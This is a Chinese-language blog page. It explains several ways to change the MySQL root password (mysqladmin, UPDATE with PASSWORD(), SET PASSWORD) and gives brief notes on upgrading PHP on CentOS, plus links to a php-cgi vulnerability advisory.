这里需要注意phpmyadmin默认是不允许Mysql的root默认密码为空登陆的,如果不小心在修改密码界面选择了空密码,你需要修改 phpmyadmin的配置文件以便重新登录phpmyadmin来实现更改mysql root密码的功能。具体怎么修改下次我会说明。

使用Mysql服务配置工具修改root密码

Mysql修改root密码命令说明

除了使用phpmyadmin、Mysql服务配置工具来修改root密码之外,使用Mysql修改密码命令也可以更改root的密码。

进入Mysql数据库命令行方式有两种方式:

方式一:在Mysql开始菜单里包含Mysql命令行客户端,只要点击输入root的密码即可进入。

方式二:在DOS模式下(CMD模式)定位到Mysql安装目录下在子目录bin,调用mysql.exe进入,即

1
2
3
C:\Program Files\MySQL\MySQL Server 5.1\bin>mysql -u root -p

Enter password: ******

使用mysqladmin.exe命令来修改Mysql的root密码

一般Mysql的root默认密码为空,如果你之前并没有设置过root密码就使用mysqladmin命令,你可以使用如下mysqladmin命令来修改root密码

1
2
3
4
5
C:\Program Files\MySQL\MySQL Server 5.1\bin>mysqladmin -u root -p password 123456

Enter password:

C:\Program Files\MySQL\MySQL Server 5.1\bin>mysql -u root -p123456

如上所述使用mysqladmin第一次修改root的默认密码时,Enter password回车即可,然后使用mysql.exe命令输入root及其密码即可进入Mysql命令行。

如果已设置了Mysql的root密码,现在需要修改并进入Mysql命令行模式,则输入

1
2
3
C:\Program Files\MySQL\MySQL Server 5.1\bin>mysqladmin -u root -p123456 password root

C:\Program Files\MySQL\MySQL Server 5.1\bin>mysql -u root -proot

即可。

知识点:这里使用了到了Mysql自带的两种命令mysqladmin.exe和mysql.exe,mysqladmin修改密码的命令格式如下

1
mysqladmin -u root -p[oldpass] password newpass

注意oldpass(老密码)可选,如果root默认密码为空,则不需要输入,如果需要更改老密码,请注意老密码与-p之间不要有空格,否则会报错,另外password和newpass(新密码)之间以空格分隔。

mysql命令与mysqladmin命令格式大同小异,主要用来输入正确的用户名和密码后进入Mysql命令行模式,格式如下

1
mysql -u root -p[password]

如果不输入password,回车后会出现Enter password的提示。如果root密码为空,也不需要输入password,出现Enter password提示后回车即可。

使用update命令来修改Mysql的root密码

使用Mysql update命令既可以修改root的老密码,也可设置root的密码为空,如果使用update命令更改root的密码,需要使用Mysql自带的加密 函数PASSWORD(string),该函数对一个明文密码进行加密,是不能解密的,专门用于mysql.user(用户权限表)中设置密码的。

使用update命令修改root密码的方法如下

1
2
3
4
5
6
7
8
9
10
11
12
13
mysql> use mysql

Database changed

mysql> update user set password=PASSWORD(’123456′) where user=’root’;

Query OK, 0 rows affected (0.00 sec)

Rows matched: 1  Changed: 0  Warnings: 0

mysql> flush privileges;

Query OK, 0 rows affected (0.00 sec)

注意在使用update后,需要进一步输入flush privileges;语句,否则修改密码命令操作不会生效,如果需要设置Mysql的root密码为空,则不需要使用PASSWORD函数,直接

1
update user set password=” where user=’root’;

即可,其他的一样。

使用set password命令修改Mysql的root密码

1
2
3
4
5
mysql> use mysql

Database changed

mysql> set password for ‘root’@'localhost’=PASSWORD(‘leapsoulcn’);

使用set password命令时也需要使用PASSWORD函数,但不需要flush privileges;即可使修改密码的命令操作生效。使用set password命令修改root密码时请务必操作谨慎,容易出错导致无法登陆,

至此,常用的Mysql修改root密码的方法和命令就介绍完了,应该讲Mysql的root密码是非常重要的,如果忘记了root密码或被盗 用,会产生严重的后果,建议最好重命名root用户,或者在user(用户权限表)中新建一个其他用户,赋予常用的最低权限配置,以保证网站的安全性,也 方便今后重置或者更改root密码。

升级php5.1.6至5.2.17(32位)

作者: 日期: 2012 年 5 月 5 日 评论关闭

vi /etc/yum.repos.d/utterrambling.repo

[utterramblings]
name=Jason’s Utter Ramblings Repo
baseurl=http://www.jasonlitka.com/media/EL5/i386/
enabled=1
gpgcheck=1
gpgkey=http://www.jasonlitka.com/media/RPM-GPG-KEY-jlitka

yum -y upgrade php

升级完毕,php -v

PHP 5.2.17 (cli) (built: Aug 31 2011 17:06:47)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies
[root@xxx yum.repos.d]# mysql_upgrade -uroot -p

备注:注意升级php后,mysql会相应升级,需手动执行mysql_upgrade,不然无法使用virtualmin开通虚拟主机。

php-cgi bug

作者: 日期: 2012 年 5 月 4 日 评论关闭

http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

 

http://zone.wooyun.org/content/151